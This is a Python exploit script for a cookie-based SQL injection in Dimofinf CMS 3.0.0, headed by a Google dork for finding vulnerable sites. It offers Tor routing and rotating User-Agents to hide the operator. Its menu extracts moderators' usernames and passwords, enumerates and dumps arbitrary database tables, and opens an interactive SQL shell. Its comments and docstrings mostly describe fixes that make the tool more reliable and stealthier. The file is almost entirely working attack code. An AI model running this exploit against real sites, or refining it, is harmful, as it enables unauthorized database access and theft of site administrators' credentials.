# Dimofinf CMS Automatic Cookie SQL Injection exploit
# Google Dork: intext:"Powered by Dimofinf"
# Date: 19/11/2015
# Author: D35m0nd142
# Software link: http://www.dimofinf.net
# Version: 3.0.0
# Tested on: Dimofinf version 3.0.0
# Sometimes the vulnerability lets you retrieve the moderators' usernames and passwords but not the list of tables and columns,
# or vice versa; so if one option does not work, try the other one anyway.
#!/usr/bin/python
import socks
import socket
import requests
import sys,os,time
from random import randint
# Prefix of the MySQL error message the error-based payloads provoke
# ("Duplicate entry '<key>' for key ..."); every extraction loop keeps going
# only while the response still contains it.
check = "Duplicate entry '"

# Tor SOCKS listener. 9150 is the port the Tor Browser bundle listens on; a
# stand-alone tor daemon usually listens on 9050 -- adjust if needed.
tor_addr = "127.0.0.1"
tor_port = 9150

# Small pool of browser User-Agent strings; one is picked per run so the
# requests do not all carry python-requests' default UA.
agents = [
    "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36",
    "IBM WebExplorer /v0.94",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13",
    "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
]

# Note: randint(0, 9) folded modulo six agents is not a uniform pick; kept as is.
rand = randint(0, 9)
# Filled in from the prompt below; req() reads it as a module global.
url = ""
selected_agent = agents[rand % len(agents)]
headers = {'User-Agent': selected_agent}
def removeDot(s):
    """Drop the leading separator character and return the rest.

    The payloads prepend 0x3a (':') to every leaked value, so extract()
    hands back ':value'; this strips that first character. An empty string
    comes back unchanged.
    """
    _head, rest = s[:1], s[1:]
    return rest
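def extract(out, marker=None):
    """Return the value the error-based payload leaked into *out*.

    The payloads make MySQL report "Duplicate entry '<key>' for key ...",
    where <key> is ':' + value + '~' + digit. This returns everything after
    the first occurrence of *marker* (default: the module-level ``check``)
    up to, but not including, the first '~'. The leading ':' is kept;
    callers strip it with removeDot().

    Changes from the original scan: the marker length is no longer a
    hard-coded 17; a marker sitting at the very end of *out* is found
    (the old loop bound skipped that position); and when the marker is
    absent the result is "" instead of the page text from offset 0, which
    made a non-error page look like a leaked value.
    """
    if marker is None:
        marker = check
    pos = out.find(marker)
    if pos < 0:
        return ""
    start = pos + len(marker)
    end = out.find('~', start)
    return out[start:] if end < 0 else out[start:end]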
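def req(cookies, timeout=30):
    """GET the module-level ``url`` with *cookies* and the randomized
    ``headers``; return the response body as text.

    Fix: the original ignored its ``cookies`` parameter and read the module
    global ``cookie`` instead, so a caller passing any other dict silently
    re-sent whatever the last global payload was. *timeout* (seconds) keeps a
    stalled target from hanging the tool; network failures surface as
    ``requests.RequestException`` from the caller's point of view.
    """
    r = requests.get(url, cookies=cookies, headers=headers, timeout=timeout)
    return r.text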
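# ---------------------------------------------------------------------------
# Interactive driver.
# ---------------------------------------------------------------------------

# The file targets Python 2 (raw_input); this shim lets it run under 3 as well.
try:
    raw_input
except NameError:
    raw_input = input

REQUEST_TIMEOUT = 30  # seconds per request; a stalled target must not hang the tool
MAX_ROWS = 10000      # hard stop for the LIMIT n,1 walkers if the error never clears

# Error-based extraction template. The inner SELECT substituted for %s is wrapped
# as ':'<value>'~'<0|1> and used as a GROUP BY key; the floor(rand(0)*2) trick
# makes MySQL raise "Duplicate entry '<key>' for key ..." and the CMS echoes the
# error, leaking the key. extract() then cuts the value between ':' and '~'.
PAYLOAD = ("1' and (select 1 from (select count(*),concat(0x3a,(%s),0x7e,"
           "floor(rand(0)*2))a from information_schema.tables group by a)x)#")

# Set to a socks5h:// mapping when the operator asks for Tor; None = direct.
proxies = None


def _fetch(dimguest_value):
    """GET the target with *dimguest_value* as the 'dimguest' cookie; return body text.

    Uses the module globals ``url``, ``headers`` and ``proxies``. Network errors
    propagate as requests.RequestException.
    """
    r = requests.get(url, cookies={'dimguest': dimguest_value}, headers=headers,
                     proxies=proxies, timeout=REQUEST_TIMEOUT)
    return r.text


def _walk(inner_for_row, skip_repeats=False):
    """Yield leaked values for rows 0, 1, 2, ... until the error disappears.

    *inner_for_row(n)* must return the inner SELECT for row n (a "limit n,1"
    query). The walk ends when a response no longer contains ``check`` -- i.e.
    LIMIT ran past the last row -- or after MAX_ROWS requests. Empty values
    are skipped; with *skip_repeats*, a non-empty value seen before ends the
    walk (the original's guard for the column listing).
    """
    seen = set()
    for n in range(MAX_ROWS):
        body = _fetch(PAYLOAD % inner_for_row(n))
        if check not in body:
            return
        got = extract(body)
        if not got:
            continue
        if skip_repeats and got in seen:
            return
        seen.add(got)
        yield got
    print("[!] Stopped after %d rows; the error never cleared." % MAX_ROWS)


def _looks_injectable(body):
    """True when the probe response shows the CMS's raw SQL error page."""
    return ("Database Error" in body and "Invalid SQL" in body
            and "You have an error in your SQL" in body)


def main():
    """Prompt for a target, confirm the cookie injection, then run the chosen mode."""
    global url, proxies

    print("\n-----------------------------------------------------------")
    print("Dimofinf CMS v3.0.0 Automatic Cookie SQL Injection exploit")
    print("Author: D35m0nd142")
    print("-----------------------------------------------------------")
    url = raw_input("\nEnter URL -> ")
    if "http" not in url:
        url = "http://%s" % url

    tor = raw_input("Do you want to use TOR? (y/n) ")
    if tor in ("y", "Y", "yes"):
        # Route through Tor with requests' own SOCKS support (needs PySocks,
        # which the `import socks` at the top already requires). The socks5h
        # scheme hands hostname resolution to the proxy, so the target's DNS
        # lookup does not leave this host -- with the old global
        # socket.socket = socks.socksocket monkeypatch the name lookup can
        # still happen locally before the proxied connect (TODO confirm with a
        # packet capture on your setup). Any proxy problem surfaces on the
        # first request below; setting the mapping itself never connects.
        proxies = {
            'http': 'socks5h://%s:%d' % (tor_addr, tor_port),
            'https': 'socks5h://%s:%d' % (tor_addr, tor_port),
        }

    session = requests.Session()
    try:
        session.get(url, headers=headers, proxies=proxies, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as e:
        print("[ERROR] Could not reach the target (check URL / TOR): %s" % e)
        sys.exit(1)

    if "dimguest" not in session.cookies.get_dict():
        print("\n[+] Target not vulnerable. (cookie 'dimguest' not found.)")
        return

    print("\n[+] 'dimguest' cookie found. Checking exploitability..")
    # A lone quote in the cookie value reaching the SQL error page is the
    # only evidence used here; a page that hides DB errors will be reported
    # as not vulnerable even if the injection exists.
    if not _looks_injectable(_fetch("1'")):
        print("[-] '%s' not vulnerable, or patched." % url)
        return
    print("[+] Target seems to be exploitable (SQL error found).")

    current = extract(_fetch(PAYLOAD % "select user()"))
    # Heuristic kept from the original: a very long "value" means the marker
    # matched something other than the expected error line.
    if len(current) < 70:
        print("[+] Current User: %s" % removeDot(current))
    else:
        print("[+] Current User: ?")

    print("\n----------------------------------------")
    print(" 1) Get moderators' usernames:passwords")
    print(" 2) Browse DB (wizard)")
    print(" 3) SQL shell (difficult)")
    print("----------------------------------------")
    choice = raw_input(" -> ")
    print("")

    if choice == "1":
        found = 0
        for got in _walk(lambda n: "select Concat(username,0x3a,password) from moderators limit %d,1" % n):
            print("[+] GOT: '%s'" % removeDot(got))
            found += 1
        if found == 0:
            print("[-] '%s' not vulnerable, or patched." % url)

    elif choice == "2":
        print("[*] Gathering tables..\n")
        n_tables = 0
        for got in _walk(lambda n: "select Concat(table_name) from information_schema.tables where table_schema=database() limit %d,1" % n):
            print("[Table] '%s'" % removeDot(got))
            n_tables += 1
        if n_tables == 0:
            print("[-] No table found :(")

        wanted = raw_input("\nEnter the tables (separated by ',') of which you want the columns -> ")
        for table in [t.strip() for t in wanted.split(',') if t.strip()]:
            print("\n[+] Columns in '%s':\n" % table)
            # The name is spliced into a quoted literal; a name containing a
            # quote breaks the query (operator input, so only noted). The
            # listing is scoped to the current schema like the table walk, so
            # same-named tables in other databases do not mix in.
            n_cols = 0
            for got in _walk(lambda n, t=table: "select Concat(column_name) from information_schema.columns where table_schema=database() and table_name='%s' limit %d,1" % (t, n),
                             skip_repeats=True):
                print(" [Column] '%s'" % removeDot(got))
                n_cols += 1
            if n_cols == 0:
                print("[-] No column found :(")

        while True:
            dump = raw_input("\nEnter the table and columns you want to dump (ex: table_name:column1,column2) -> ")
            if dump in ("exit", "quit"):
                break
            table, _sep, colspec = dump.partition(':')
            table = table.strip()
            cols = [c.strip() for c in colspec.split(',') if c.strip()]
            if not table or not cols:
                print("[INPUT ERROR] Expected table_name:column1,column2")
                continue
            print(cols)
            print("\n[*] Dumping..\n")
            # Columns are joined with 0x3a so one row comes back as col1:col2:...
            for got in _walk(lambda n, t=table, c=cols: "select Concat(%s) from %s limit %d,1" % (",0x3a,".join(c), t, n)):
                print("[Dump]: '%s'" % removeDot(got))
            print("")

    elif choice == "3":
        print("[*] Opening SQL shell..\n")
        time.sleep(0.6)
        while True:
            cmd = raw_input("SQL-shell> ")
            if cmd in ("exit", "quit"):
                break
            # The statement is injected verbatim after "1' and (" -- to get a
            # value back it must itself provoke the duplicate-entry error
            # (the PAYLOAD shape); anything else only reports no leak.
            body = _fetch("1' and (%s)#" % cmd)
            if check in body:
                print("[+] GOT: '%s'\n" % removeDot(extract(body)))
            else:
                print("[-] No duplicate-entry error in the response.\n")

    else:
        print("[INPUT ERROR] You entered a not valid choice!")
        sys.exit(1)


if __name__ == "__main__":
    main()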